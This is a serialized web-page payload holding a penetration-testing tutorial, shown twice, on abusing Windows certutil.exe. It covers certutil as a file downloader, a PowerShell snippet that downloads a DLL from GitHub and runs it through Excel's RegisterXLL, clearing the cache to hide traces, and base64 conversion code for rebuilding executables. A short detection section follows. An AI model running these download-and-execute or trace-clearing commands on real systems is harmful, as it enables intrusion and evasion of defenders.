[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHvHZhWENSSwMZ4NicSyLCFrOZgWsr3xFqru53PGmsF4":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},853,"How can certutil.exe be used as a downloader in penetration testing?","certutil.exe can download files using the `-urlcache -split -f` flags, followed by the URL. For example, `certutil.exe -urlcache -split -f https:\u002F\u002Fexample.com\u002Ffile.txt` saves the file with the same name, or you can specify a custom filename. It also supports binary files like DLLs and works on Windows XP through Windows 10. For more details, see [certutil in Penetration Testing](\u002Fnews\u002Fcertutil-in-penetration-testing).","\u003Cp>certutil.exe can download files using the `-urlcache -split -f` flags, followed by the URL. For example, `certutil.exe -urlcache -split -f https:\u002F\u002Fexample.com\u002Ffile.txt` saves the file with the same name, or you can specify a custom filename. It also supports binary files like DLLs and works on Windows XP through Windows 10. For more details, see [certutil in Penetration Testing](\u002Fnews\u002Fcertutil-in-penetration-testing).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fcertutil-in-penetration-testing\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-certutilexe-be-used-as-a-downloader-in-penetration-testing-1777481622754","certutil, downloader, penetration testing, urlcache",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},209,"certutil in Penetration Testing","certutil-in-penetration-testing","Learn how to use certutil for file downloads, hash calculation, and base64 encoding in penetration testing, with tips for clearing cache and common methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>---\u003C\u002Fp>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I learned some exploitation techniques about certutil from Casey Smith‏ @subTee's Twitter. This article will combine some of my own experience to introduce the application of certutil in penetration testing, supplement methods for implementing downloaders in cmd, and summarize common methods for base64 encoding conversion.\u003C\u002Fp>\u003Cp>\u003Cstrong>Learning Resources:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F888101536475344896\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F888071631528235010\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Application of certutil.exe in Penetration Testing\u003C\u002Fli>\u003Cli>Common Methods for Downloaders\u003C\u002Fli>\u003Cli>Common Methods for Base64 Encoding Conversion\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to certutil\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For certificate management\u003C\u002Fp>\u003Cp>Supports XP to Windows 10\u003C\u002Fp>\u003Cp>For more operational instructions, see https:\u002F\u002Ftechnet.microsoft.com\u002Fzh-cn\u002Flibrary\u002Fcc755341(v=ws.10).aspx\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In the previous article 'Domain Penetration – EFS File Decryption', certutil.exe was used to import certificates\u003C\u002Fp>\u003Ch2>0x03 Applications in Penetration Testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1、downloader\u003C\u002Fh3>\u003Cp>(1) Save in the current path with the same file name as the URL\u003C\u002Fp>\u003Cp>eg:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.txt\u003C\u002Fp>\u003Cp>(2) Save in the current path with a specified file name\u003C\u002Fp>\u003Cp>eg:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.txt file.txt\u003C\u002Fp>\u003Cp>(3) Saved in the cache directory with a random name\u003C\u002Fp>\u003Cp>Cache directory location: %USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Cp>e.g.:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -f https:\u002F\u002Fraw.githubusercontent.某开源项目.txt\u003C\u002Fp>\u003Cp>(4) Supports saving binary files\u003C\u002Fp>\u003Cp>e.g.:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using the downloader defaults to saving a copy of the downloaded file in the cache directory location: %USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Cp>\u003Cstrong>Method to clear downloaded file copies:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>Method 1:\u003C\u002Fstrong> Directly delete the corresponding file in the cache directory\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017247473_0_adb3fa9d2a.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Method 2:\u003C\u002Fstrong>Command line:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.dll delete\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>View cached items:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache *\u003C\u002Fp>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017268080_1_955a5e5563.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual test:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test system with Office installed, PowerShell code to download and execute the DLL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$path=\"c:\\test\\msg1.dll\"\u003Cbr>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002Fmsg.dll $path\u003Cbr>$excel = [activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\"))\u003Cbr>$excel.RegisterXLL($path)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017292957_2_4115ee8a8c.jpeg\">\u003C\u002Fp>\u003Ch3>2. Calculate file hash\u003C\u002Fh3>\u003Cp>(1) SHA1\u003C\u002Fp>\u003Cp>certutil.exe -hashfile msg.dll\u003C\u002Fp>\u003Cp>(2) SHA256:\u003C\u002Fp>\u003Cp>certutil.exe -hashfile msg.dll SHA256\u003C\u002Fp>\u003Cp>(3) MD5:\u003C\u002Fp>\u003Cp>certutil.exe -hashfile msg.dll MD5\u003C\u002Fp>\u003Ch3>3. Base64 encoding conversion\u003C\u002Fh3>\u003Cp>(1) Base64 encoding:\u003C\u002Fp>\u003Cp>CertUtil -encode InFile OutFile\u003C\u002Fp>\u003Cp>(2) Base64 decoding\u003C\u002Fp>\u003Cp>CertUtil -decode InFile OutFile\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encoded file will have two identification information added:\u003C\u002Fp>\u003Cp>File header:\u003C\u002Fp>\u003Cp>-----BEGIN CERTIFICATE-----\u003C\u002Fp>\u003Cp>File footer:\u003C\u002Fp>\u003Cp>-----END CERTIFICATE-----\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017324774_3_9154f75971.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Common downloader methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article \"Penetration Techniques - Various Methods for Uploading Files via cmd\", common downloader methods under cmd were summarized. Comparatively, using certUtil is simple and fast, but attention should be paid to clearing the cache after use. The path is as follows:\u003C\u002Fp>\u003Cp>%USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Cp>Common downloader methods are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>certUtil\u003C\u002Fli>\u003Cli>powershell\u003C\u002Fli>\u003Cli>csc\u003C\u002Fli>\u003Cli>vbs\u003C\u002Fli>\u003Cli>JScript\u003C\u002Fli>\u003Cli>hta\u003C\u002Fli>\u003Cli>bitsadmin\u003C\u002Fli>\u003Cli>wget\u003C\u002Fli>\u003Cli>debug\u003C\u002Fli>\u003Cli>ftp\u003C\u002Fli>\u003Cli>ftfp\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Common Methods for Base64 Encoding Conversion\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>When writing scripts to manipulate binary files, errors often occur due to invisible characters, so it is common to first encode the binary file in base64 before manipulation, and finally decode it to restore the binary file.\u003C\u002Fp>\u003Cp>Therefore, here is a compilation of common base64 encoding conversion methods corresponding to different development tools.\u003C\u002Fp>\u003Ch3>1. PowerShell\u003C\u002Fh3>\u003Cp>Base64 encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$PEBytes = [System.IO.File]::ReadAllBytes(\"C:\\windows\\system32\\calc.exe\")\u003Cbr>$Base64Payload = [System.Convert]::ToBase64String($PEBytes)\u003Cbr>Set-Content base64.txt -Value $Base64Payload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$Base64Bytes = Get-Content (\"base64.txt\")\u003Cbr>$PEBytes = [System.Convert]::FromBase64String($Base64Bytes)\u003Cbr>[System.IO.File]::WriteAllBytes(\"calc.exe\", $PEBytes)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. C#\u003C\u002Fh3>\u003Cp>Base64 encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System.IO;\u003Cbr>\u003Cbr>byte[] AsBytes = File.ReadAllBytes(@\"C:\\windows\\system32\\calc.exe\");\u003Cbr>String AsBase64String = Convert.ToBase64String(AsBytes);\u003Cbr>StreamWriter sw = new StreamWriter(@\"C:\\test\\base64.txt\");\u003Cbr>sw.Write(AsBase64String);\u003Cbr>sw.Close();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System.IO;\u003Cbr>\u003Cbr>String AsString = File.ReadAllText(@\"C:\\test\\base64.txt\");\u003Cbr>byte[] bytes = Convert.FromBase64String(AsString);          \u003Cbr>FileStream fs = new FileStream(@\"C:\\test\\calc.exe\", FileMode.Create);\u003Cbr>fs.Write(bytes, 0, bytes.Length);\u003Cbr>fs.Flush();\u003Cbr>fs.Close();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>There are two bugs in the previous article \"Penetration Techniques - Various Methods of Uploading Files via cmd\"\u003C\u002Fp>\u003Cp>\"Method for decrypting base64 files and generating exe: \"\u003C\u002Fp>\u003Cp>The PowerShell code and C# code in it contain bugs. The corrected code is subject to this article.\u003C\u002Fp>\u003Ch3>3. js\u003C\u002Fh3>\u003Cp>Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>fso1=new ActiveXObject(\"Scripting.FileSystemObject\");\u003Cbr>f=fso1.OpenTextFile(\"C:\\\\test\\\\base64.txt\",1);\u003Cbr>base64string=f.ReadAll();\u003Cbr>f.Close();\u003Cbr>enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");\u003Cbr>length = enc.GetByteCount_2(base64string);\u003Cbr>ba = enc.GetBytes_4(base64string);\u003Cbr>transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");\u003Cbr>ba = transform.TransformFinalBlock(ba, 0, length);\u003Cbr>s = new ActiveXObject(\"ADODB.Stream\");\u003Cbr>s.Type = 1;\u003Cbr>s.Open();\u003Cbr>s.Write(ba);\u003Cbr>s.SaveToFile(\"C:\\\\test\\\\calc.exe\", 2);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. certutil\u003C\u002Fh3>\u003Cp>Base64 Encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CertUtil -encode InFile OutFile\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 Decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CertUtil -decode InFile OutFile\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encoded file will add two identification information:\u003C\u002Fp>\u003Cp>File header:\u003C\u002Fp>\u003Cp>-----BEGIN CERTIFICATE-----\u003C\u002Fp>\u003Cp>File footer:\u003C\u002Fp>\u003Cp>-----END CERTIFICATE-----\u003C\u002Fp>\u003Ch2>0x06 Detecting downloader\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Check the cache records of files downloaded using certUtil:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache *\u003C\u002Fp>\u003Cp>Cache file location:\u003C\u002Fp>\u003Cp>%USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the application of certutil in penetration testing, detailing the implementation and detection methods of using certutil as a downloader, and finally summarizes common methods for base64 encoding conversion.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>---\u003C\u002Fp>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I learned some exploitation techniques about certutil from Casey Smith‏ @subTee's Twitter. This article will combine some of my own experience to introduce the application of certutil in penetration testing, supplement methods for implementing downloaders in cmd, and summarize common methods for base64 encoding conversion.\u003C\u002Fp>\u003Cp>\u003Cstrong>Learning Resources:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F888101536475344896\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F888071631528235010\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Application of certutil.exe in Penetration Testing\u003C\u002Fli>\u003Cli>Common Methods for Downloaders\u003C\u002Fli>\u003Cli>Common Methods for Base64 Encoding Conversion\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to certutil\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For certificate management\u003C\u002Fp>\u003Cp>Supports XP to Windows 10\u003C\u002Fp>\u003Cp>For more operational instructions, see https:\u002F\u002Ftechnet.microsoft.com\u002Fzh-cn\u002Flibrary\u002Fcc755341(v=ws.10).aspx\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In the previous article 'Domain Penetration – EFS File Decryption', certutil.exe was used to import certificates\u003C\u002Fp>\u003Ch2>0x03 Applications in Penetration Testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1、downloader\u003C\u002Fh3>\u003Cp>(1) Save in the current path with the same file name as the URL\u003C\u002Fp>\u003Cp>eg:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.txt\u003C\u002Fp>\u003Cp>(2) Save in the current path with a specified file name\u003C\u002Fp>\u003Cp>eg:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.txt file.txt\u003C\u002Fp>\u003Cp>(3) Saved in the cache directory with a random name\u003C\u002Fp>\u003Cp>Cache directory location: %USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Cp>e.g.:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -f https:\u002F\u002Fraw.githubusercontent.某开源项目.txt\u003C\u002Fp>\u003Cp>(4) Supports saving binary files\u003C\u002Fp>\u003Cp>e.g.:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using the downloader defaults to saving a copy of the downloaded file in the cache directory location: %USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Cp>\u003Cstrong>Method to clear downloaded file copies:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>Method 1:\u003C\u002Fstrong> Directly delete the corresponding file in the cache directory\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017247473_0_adb3fa9d2a-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Method 2:\u003C\u002Fstrong>Command line:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.某开源项目.dll delete\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>View cached items:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache *\u003C\u002Fp>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017268080_1_955a5e5563-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Actual test:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test system with Office installed, PowerShell code to download and execute the DLL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$path=\"c:\\test\\msg1.dll\"\u003Cbr>certutil.exe -urlcache -split -f https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002Fmsg.dll $path\u003Cbr>$excel = [activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\"))\u003Cbr>$excel.RegisterXLL($path)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017292957_2_4115ee8a8c-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Calculate file hash\u003C\u002Fh3>\u003Cp>(1) SHA1\u003C\u002Fp>\u003Cp>certutil.exe -hashfile msg.dll\u003C\u002Fp>\u003Cp>(2) SHA256:\u003C\u002Fp>\u003Cp>certutil.exe -hashfile msg.dll SHA256\u003C\u002Fp>\u003Cp>(3) MD5:\u003C\u002Fp>\u003Cp>certutil.exe -hashfile msg.dll MD5\u003C\u002Fp>\u003Ch3>3. Base64 encoding conversion\u003C\u002Fh3>\u003Cp>(1) Base64 encoding:\u003C\u002Fp>\u003Cp>CertUtil -encode InFile OutFile\u003C\u002Fp>\u003Cp>(2) Base64 decoding\u003C\u002Fp>\u003Cp>CertUtil -decode InFile OutFile\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encoded file will have two identification information added:\u003C\u002Fp>\u003Cp>File header:\u003C\u002Fp>\u003Cp>-----BEGIN CERTIFICATE-----\u003C\u002Fp>\u003Cp>File footer:\u003C\u002Fp>\u003Cp>-----END CERTIFICATE-----\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017324774_3_9154f75971-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Common downloader methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article \"Penetration Techniques - Various Methods for Uploading Files via cmd\", common downloader methods under cmd were summarized. Comparatively, using certUtil is simple and fast, but attention should be paid to clearing the cache after use. The path is as follows:\u003C\u002Fp>\u003Cp>%USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Cp>Common downloader methods are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>certUtil\u003C\u002Fli>\u003Cli>powershell\u003C\u002Fli>\u003Cli>csc\u003C\u002Fli>\u003Cli>vbs\u003C\u002Fli>\u003Cli>JScript\u003C\u002Fli>\u003Cli>hta\u003C\u002Fli>\u003Cli>bitsadmin\u003C\u002Fli>\u003Cli>wget\u003C\u002Fli>\u003Cli>debug\u003C\u002Fli>\u003Cli>ftp\u003C\u002Fli>\u003Cli>ftfp\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Common Methods for Base64 Encoding Conversion\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>When writing scripts to manipulate binary files, errors often occur due to invisible characters, so it is common to first encode the binary file in base64 before manipulation, and finally decode it to restore the binary file.\u003C\u002Fp>\u003Cp>Therefore, here is a compilation of common base64 encoding conversion methods corresponding to different development tools.\u003C\u002Fp>\u003Ch3>1. PowerShell\u003C\u002Fh3>\u003Cp>Base64 encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$PEBytes = [System.IO.File]::ReadAllBytes(\"C:\\windows\\system32\\calc.exe\")\u003Cbr>$Base64Payload = [System.Convert]::ToBase64String($PEBytes)\u003Cbr>Set-Content base64.txt -Value $Base64Payload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$Base64Bytes = Get-Content (\"base64.txt\")\u003Cbr>$PEBytes = [System.Convert]::FromBase64String($Base64Bytes)\u003Cbr>[System.IO.File]::WriteAllBytes(\"calc.exe\", $PEBytes)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. C#\u003C\u002Fh3>\u003Cp>Base64 encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System.IO;\u003Cbr>\u003Cbr>byte[] AsBytes = File.ReadAllBytes(@\"C:\\windows\\system32\\calc.exe\");\u003Cbr>String AsBase64String = Convert.ToBase64String(AsBytes);\u003Cbr>StreamWriter sw = new StreamWriter(@\"C:\\test\\base64.txt\");\u003Cbr>sw.Write(AsBase64String);\u003Cbr>sw.Close();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System.IO;\u003Cbr>\u003Cbr>String AsString = File.ReadAllText(@\"C:\\test\\base64.txt\");\u003Cbr>byte[] bytes = Convert.FromBase64String(AsString);          \u003Cbr>FileStream fs = new FileStream(@\"C:\\test\\calc.exe\", FileMode.Create);\u003Cbr>fs.Write(bytes, 0, bytes.Length);\u003Cbr>fs.Flush();\u003Cbr>fs.Close();\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>There are two bugs in the previous article \"Penetration Techniques - Various Methods of Uploading Files via cmd\"\u003C\u002Fp>\u003Cp>\"Method for decrypting base64 files and generating exe: \"\u003C\u002Fp>\u003Cp>The PowerShell code and C# code in it contain bugs. The corrected code is subject to this article.\u003C\u002Fp>\u003Ch3>3. js\u003C\u002Fh3>\u003Cp>Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>fso1=new ActiveXObject(\"Scripting.FileSystemObject\");\u003Cbr>f=fso1.OpenTextFile(\"C:\\\\test\\\\base64.txt\",1);\u003Cbr>base64string=f.ReadAll();\u003Cbr>f.Close();\u003Cbr>enc = new ActiveXObject(\"System.Text.ASCIIEncoding\");\u003Cbr>length = enc.GetByteCount_2(base64string);\u003Cbr>ba = enc.GetBytes_4(base64string);\u003Cbr>transform = new ActiveXObject(\"System.Security.Cryptography.FromBase64Transform\");\u003Cbr>ba = transform.TransformFinalBlock(ba, 0, length);\u003Cbr>s = new ActiveXObject(\"ADODB.Stream\");\u003Cbr>s.Type = 1;\u003Cbr>s.Open();\u003Cbr>s.Write(ba);\u003Cbr>s.SaveToFile(\"C:\\\\test\\\\calc.exe\", 2);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. certutil\u003C\u002Fh3>\u003Cp>Base64 Encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CertUtil -encode InFile OutFile\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 Decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CertUtil -decode InFile OutFile\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encoded file will add two identification information:\u003C\u002Fp>\u003Cp>File header:\u003C\u002Fp>\u003Cp>-----BEGIN CERTIFICATE-----\u003C\u002Fp>\u003Cp>File footer:\u003C\u002Fp>\u003Cp>-----END CERTIFICATE-----\u003C\u002Fp>\u003Ch2>0x06 Detecting downloader\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Check the cache records of files downloaded using certUtil:\u003C\u002Fp>\u003Cp>certutil.exe -urlcache *\u003C\u002Fp>\u003Cp>Cache file location:\u003C\u002Fp>\u003Cp>%USERPROFILE%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the application of certutil in penetration testing, detailing the implementation and detection methods of using certutil as a downloader, and finally summarizes common methods for base64 encoding conversion.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",727,"Onedaysec",3,"published","2026-02-02T07:38:21.197Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"CertUtil in Penetration Testing: Downloaders & Base64 Encoding","certutil, penetration testing, downloader, base64 encoding, Windows exploitation, cmd techniques, file hash, PowerShell",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],856,855,854,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.194Z","2026-07-23T16:02:12.184Z","draft","2026-07-23T16:15:08.388Z"]